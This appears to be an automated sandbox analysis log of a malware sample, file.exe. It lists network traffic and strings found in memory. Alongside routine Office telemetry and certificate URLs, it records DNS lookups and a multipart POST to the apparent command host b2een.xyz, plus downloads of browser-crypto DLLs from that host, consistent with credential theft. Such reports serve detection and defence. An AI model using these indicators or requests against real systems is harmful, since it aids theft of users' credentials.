Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net

Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log3.10.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log3.10.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log3.10.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: b2een.xyz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_450.6.dr	String found in binary or memory: http://www.broofa.com
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134390728.000000002172D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, DHJKJK.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_450.6.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: file.exe, 00000000.00000003.2268505823.000000000341E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyz
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/M
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/freebl3.dll
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/mozglue.dll
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/msvcp140.dll
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/msvcp140.dll2
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/nss3.dll
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/nss3.dll2
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/softokn3.dll
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/softokn3.dll9
Source: file.exe, 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyz/sqlo.dll
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/sqlo.dllb
Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/vcruntime140.dll
